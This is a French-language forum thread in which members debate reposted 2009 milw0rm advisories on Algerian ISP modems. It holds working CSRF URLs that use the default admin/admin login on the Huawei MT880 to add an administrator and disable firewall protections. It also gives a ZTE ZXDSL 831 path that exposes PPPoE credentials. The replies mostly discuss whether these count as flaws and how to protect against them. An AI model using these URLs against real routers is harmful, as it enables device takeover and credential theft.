Jump to content

Vulnérabilité modem fawri


strongh
 Share

Recommended Posts

Bonsoir

 

J'ai trouvé par hasard ce sujet sur le site milworm.com concernant une vulnérabilité sur nos modems Fawri MT880, ya t il quelqu'un qui peut m'expliquer cette vulnérabilité.

 

 

Description:

Huawei MT880 is a device offered by the algerian telecom operator -

FAWRI, to provide ADSL Internet connexion and it's already widely in use.

Overview:

Huawei MT880 firmware and its default configuration has flaws, which

allows LAN users to gain unauthorized full access to device.

 

Here are just limited PoCs.

 

Default credentials on the web-based management interface:

 

admin/admin

 

Possible XSRFs:

 

Adding an administrator user:

http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70

 

 

Disabling firewall/anti-DoS... features:

http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70

 

 

Adding a MAC address to the whitelist:

http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104

 

 

Adding an IP address allowed by the firewall:

http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7

 

 

Over flaws are not covered in this advisory.

 

Cheers

/JA

 

# milw0rm.com [2009-08-24]

Link to comment
Share on other sites

  • Replies 64
  • Created
  • Last Reply

Top Posters In This Topic

Merci pour l'info.

 

Entre nous, les modems sont fournis avec le mot de passe par défaut n'est ce pas ? admin:admin

 

Et ce n'est pas tout le monde qui est connaisseur en la matière, n'est ce pas ? Donc une grande majorité des possesseurs de ces modems sont vulnérables à moins qu'une mise à jour du firmware verra le jour ou que l'opérateur Algérie Télécom sensibilise ses clients.

Link to comment
Share on other sites

1) la preumiere pour le Huawei MT880

 

Description:

Huawei MT880 is a device offered by the algerian telecom operator -

FAWRI, to provide ADSL Internet connexion and it's already widely in use.

Overview:

Huawei MT880 firmware and its default configuration has flaws, which

allows LAN users to gain unauthorized full access to device.

 

Here are just limited PoCs.

 

Default credentials on the web-based management interface:

 

admin/admin

 

Possible XSRFs:

 

Adding an administrator user:

http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70

 

 

Disabling firewall/anti-DoS... features:

http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70

 

 

Adding a MAC address to the whitelist:

http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104

 

 

Adding an IP address allowed by the firewall:

http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7

 

 

Over flaws are not covered in this advisory.

 

Cheers

/JA

 

# milw0rm.com [2009-08-24]

 

2) la deuxieme pour le ZXDSL 831

 

-----------------------------------------------------

-->> Found By SuNHouSe2 [ALGERIAN HaCkEr]

--> Made in "Maghnia City" (DZ)

--> Contact : sunhouse2@yahoo.com

--> Greetz to : His0k4 all my friends

--> Good Ramadan to all muslims

-----------------------------------------------------

 

Exploit tested on modem with this informations :

 

ZTE CORPORATION

 

Date : NOV 2008

Product : ADSL Modem

Model : ZXDSL 831 II --> http://www.geeksecurity.org/tsttte.JPG

Firmware Version : ZXDSL 831IIV7.5.0a_E09_OV

 

-----------------------------------------------------

Introduction:

 

This modem is used by many providers in the world like

russia india and algeria [used by provider and all clients of "Easy ADSL"].

 

Exploit :

We can get access to to configuration of the modem , and get PPPOE user & password.

 

Go only here

http://192.168.1.1/vpivci.cgi

 

A video uploaded to explain how we can use this exploit to get PPPOE sessions

with user & password

 

download video demonstration >

 

http://www.geeksecurity.org/vid/zxdsl%20exploit.rar

http://www.geeksecurity.org/vid/zxdsl-exploit-2.rar

 

------------------------------------------------------

 

# milw0rm.com [2009-08-18]

Edited by abitaf
Link to comment
Share on other sites

Et ce n'est pas tout le monde qui est connaisseur en la matière, n'est ce pas ? Donc une grande majorité des possesseurs de ces modems sont vulnérables à moins qu'une mise à jour du firmware verra le jour ou que l'opérateur Algérie Télécom sensibilise ses clients.

 

Je ne vois pas en quoi une mise à jour du firmware corrigera cela puisqu'il ne s'agit pas d'une faille mais des identifiants par défauts, les liens qui sont cités ne sont que les liens des scripts de l'interface admin du modem, on peut pas y accéder directement sans s'identifier.

 

L'unique solution serait une génération d'identifiant par défaut pour chaque client lors de la remise du modem.

Link to comment
Share on other sites

si je comprend bien,

 

a la place de l'adresse 192.168.1.1 on va mettre une plage ip de l'opérateur fawri ( après scanne de l'adresse ip ) et on peut accédé au modem d'un utilisateur dans le cas ou se dernier na pas changer son mot de passe . !!!! ???

 

imho, le port 23 n'est disponible qu'a partir du lan

Link to comment
Share on other sites

Je ne trouve pas que c'est une faille puisqu'il faut être connecté en tant qu'admin pour pouvoir mettre ces paramètres.Ce Jérôme n'a fait que donner le lien direct pour faire les manipulations.

 

si je comprend bien,

 

a la place de l'adresse 192.168.1.1 on va mettre une plage ip de l'opérateur fawri ( après scanne de l'adresse ip ) et on peut accédé au modem d'un utilisateur dans le cas ou se dernier na pas changer son mot de passe . !!!! ???

C'est impossible si le firewall du modem est activé (J'espère qu'il en possède un !).

Link to comment
Share on other sites

C'est impossible si le firewall du modem est activé (J'espère qu'il en possède un !).

 

dans une situation normale, l'accès à l'interface d'administration en web ou en telnet n'est pas possible sur l'interface wan du modem en question (AT) (uniquement à partir de l'interface lan), ce qui n'est pas le cas de certains modems (EE).

 

on peut evisager ceci tres vaguement comme une vulnerabilité si le modem est placé sur un réseau lan dans lequel les utilisateurs ne sont pas dignes de confiance (cyber café?) ou ils pourraient faire joujou avec la configuration (vol des credentiels, quand ils sont gentils)

 

certains constructeurs générent le mot de passe à partir de l'adresse mac (par ex), ou à partir du numero de serie (seul l'acces physique peut fournir l'information), il est vrai que mettre un mot de passe statique d'une telle trivialité n'est pas tres ingenieux.

Link to comment
Share on other sites

si vous prenez cela comme une faille alors tous les netgear les dlink les cisco les speedtouch sont vulnérables.

cest un raccourci pour les opération de configuration cest tout il te faut le mot de passe ,

pas besoin de changer le firmware, change le mot de passe, puis l'accès depuis le wan au modem est bloqué par défaut. cest un gar qui veut ce montrer cest tout sur (milworm).

Link to comment
Share on other sites

salam

 

C'EST BIEN DES FAILLES QUI SONT CONNUS DEPUIS ... moi j'avais connaissences de ces failles depuis 1 ou 2 ans, en plus tout les modems ou routeurs avec interface Web sont vulnérables a ces CSRF et XSS et d'authentifications ...

Je confirme que meme les routeurs d'eepad, AT ... etc (tu te souviens un jour ButterflyOfFire sur IRC) sont vulnérables, seulement les mise à jours des firmwares ne sont pas la, alors faut pas donner aux milliers des script kiddies ...

 

Petite synthese (je vais essayer de donner le moins d'info possible):

- il ne s'authentifie pas avec le password.

- il y a un GROOOOOOOOS problème d'authentification, dans ce cas le password n'est vraiment pas utilisé ...

- il y a pleins de failles XSS sur ces routeurs ...

- il y a pleins de failles CSRF (modifier tous les données et configs)

- par le contexte de ces failles ces attaques peuvent parfaitement etre exploité depuis le Wan (internet)

- le chercheur dit que c'est failles sont activé seulement depuis le LAN alors qu'on peut parfaitement le faire depuis le Wan (Internet) si il y a une certaine config et si ...

- ... pleins d'autres ...

 

Conslusion: les gens qui ont pondu ces modems n'ont jamais pensé à l'aspect sécurité et ils sont au courant et ...

 

Protection (rapidement):

- faire une mise à jour du firmware si c'est possible (mais je pense que ce n'est pas possible).

- chager le password.

- configurer la connection depuis votre PC et pas depuis votre Modem (info: password sur PC, IP de connection attribué au PC qui contient un firewall)

- firewall qui filtre l'accée au modem (car l'accée du modem va se faire depuis le PC relié au modem, ce PC fonctionne en mode routeur).

- ne pas consulter des sites Web et des pages Web ou des liens suspects ou que vous ne connaissez pas ...

- peut etre un modem USB est plus pratique (moi j'utilise un ce moment), mais c'est sure qu'ils ont d'autres failles ...

- relire le poste de tewfik.

- ... a suivre

 

en gros voici le conseil de secdz:

- "Ne pas faire confiance à quoique se soit, à commencer par ton PC et ces routeurs"

- "Rester sous la radar et ne pas attirer l'attention"

 

Ma situation qui résume ce que secdz a dit:

à cause de mes petits frères (telechargment de logiciel infécté depuis des sites arabs) j'ai du changé le password plusieurs fois en plus avec leurs attitude ça ne va pas se régler :).

 

@bilmagic:

oui désolé c'est encore moi :), tous ce que tu cite est vulnérable meme ces sisco ...

 

@racNET

hbibi rak jari :)

 

SLVPL si il y a un membre qui à plus de temps que moi, qu'il réorganise mon poste en un nouveau sujet (les sollutions et apporter des nouvelles aussi), vraiment désolé je manque énormément de temps, merci encore.

 

PS: je n'ai jamais exploité ces failles (faut pas nuir aux autres), je ne ferai jamais ça inchallah.

 

 

saha ftourkoum.

Edited by tixxDZ
Link to comment
Share on other sites

salam

 

@bilmagic

c'est pas des fouteeeeeeeezzzzzzzz, désolé mais il ne faut pas dire des conneries si on ne maitrise pas.

 

@abitaf

c'est des failles CSRFs et preseque tous les routeurs avec interface Web sont vulnérables. C'est parfaitement exploitable à 100% sans connaitre le password ...

 

concernant le premier (chercheur français):

- il dit que c'est accessible depuis le Lan alors qu'on peut parfaitement (peut etre forger des paquets) accéder depuis le Wan (internet).

- il publie seulement quelques CSRF alors qu'il y a pleins d'autres et encore plus dangereuses (mais il dit qu'il a d'autres).

- il y a pleins d'autres XSS qui peuvent etre stocké sur le modem.

 

concernant le deuxième (chercheur algérien):

- c'est pas des CSRF, c'est un problème d'authentification, si un utilisateur

- l'exploitation est très très simple.

- dans la video le chercheur dis que le password est crypté => c'est faux, ce n'est qu'un simple encodage.

- l'exploitation est très très simple.

 

PS: désolé abitaf mais peut etre que ton poste est hors charte, faut effacer.

 

 

@ktalgerie

si tu fais allusion à moi, alors normalement je ne publie pas ce genre de faille et surtout sur milw0rm (c'est des trucs qui seront utilisé par des scripts kiddies et qui vont faire du mal à d'autres), je publie seulement si l'exploitation ou le PoF est cool (challenge) sinon pas besoin je vais simplement perdre plus de temps.

 

PS: mon vrai nom est djalal :) et c'est pas moi qui a publié, bon rétablissement KT inchallah.

 

 

je poste seulement pour signaler, je ne vais pas dire plus, comment se protéger et bien consulter ce topic "http://www.forumdz.com/showthread.php?t=16854&page=2", merci encore pour votre lecture.

 

saha ftourkoum.

Edited by tixxDZ
Link to comment
Share on other sites

Adding an administrator user:

http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70

 

 

Disabling firewall/anti-DoS... features:

http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70

 

 

Adding a MAC address to the whitelist:

http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104

 

 

Adding an IP address allowed by the firewall:

http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7

 

 

Over flaws are not covered in this advisory.

 

Cheers

/JA

 

# milw0rm.com [2009-08-24]

 

Elle est où la faille ici ? Les identifiants sont inclus à l'URL... on voit bien que l'utilisateur ADMIN accède au routeur (192.168.1.1) avec le mot de passe ADMIN. C'est grossomodo un appel direct des scripts mais cela n'outre passe pas l'authentification.

 

Il suffit de personnaliser les identifiants de son routeur pour éviter ce problème.

Link to comment
Share on other sites

Perso j'ai pas trop pigé, les identifiants sont bien controlés non? le admin admin c'est la valeur par defaut... est ce que ces méthode marche sur un routeur dont les identifiants ont été personnalisés ?

Link to comment
Share on other sites

Perso j'ai pas trop pigé, les identifiants sont bien controlés non? le admin admin c'est la valeur par defaut... est ce que ces méthode marche sur un routeur dont les identifiants ont été personnalisés ?

 

Je ne pense pas non. ça ne marche que sur des routeurs dont les identifiants sont ceux par défauts (admin/admin) ;)

Link to comment
Share on other sites

Authentification ou pas, tout lien vers une application Web pouvant modifier directement la config sans confirmation est considéré comme faille CSRF :) Et concernant les mots de passe par défaut des routeurs je t'assure que 99% des algériens les laissent !

 

pour cette faille sera accomplie il faut que l'utilisateur est complice sans en être conscient.

par exemple si tu veux changer ou obtenir quelque configs de mon modem il faut que

tu connaisse monn ip

je te fais confiance

j'execute un script, je charge une image ... de votre part

si j'ai modifié mon mot de passe alors ton attaque réussit que lorsque je suis déja authentifié

.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share




×
×
  • Create New...